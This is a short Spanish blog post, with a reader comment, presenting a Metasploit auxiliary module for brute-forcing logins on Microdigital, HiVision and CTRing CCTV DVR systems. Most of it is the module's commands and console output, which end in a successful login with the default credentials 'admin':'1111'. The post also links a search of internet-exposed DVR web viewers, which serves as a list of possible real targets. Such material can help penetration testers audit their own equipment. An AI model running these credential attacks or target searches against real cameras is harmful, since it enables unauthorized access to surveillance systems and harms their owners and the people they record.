

En este módulo se dirige a sistemas CCTV de Microdigital, HiVision, CTRing y un número importante de otros dispositivos provenientes de estas marcas. Es capaz de descubrir los equipos existentes en la red, determinar los usuarios válidos y excluir los que no lo son y realizar ataques de fuerza bruta para obtener un login válido:
msf > use auxiliary/scanner/misc/cctv_dvr_login
msf auxiliary(cctv_dvr_login) > set RHOSTS 10.10.1.14
RHOSTS => 10.10.1.14
msf auxiliary(cctv_dvr_login) > exploit
[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:’admin’ with password:”
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: ‘admin’
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:’user’ with password:”
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: ‘user’
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:’admin’ with password:’admin’
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: ‘admin’
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:’admin’ with password:’1111’
[+] 10.10.1.14:5920 Successful login: ‘admin’ : ‘1111’
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Más detalles técnicos en Gotham Digital Science Blog.
CCTVs: http://eripp.com/?ipdb=1&search=DVR+WebViewer&sort=time&order=DESC&limit=200&submitbutton=Search
muy interesante, los SISTEMAS de seguridad si que han evolucioando
ResponderEliminar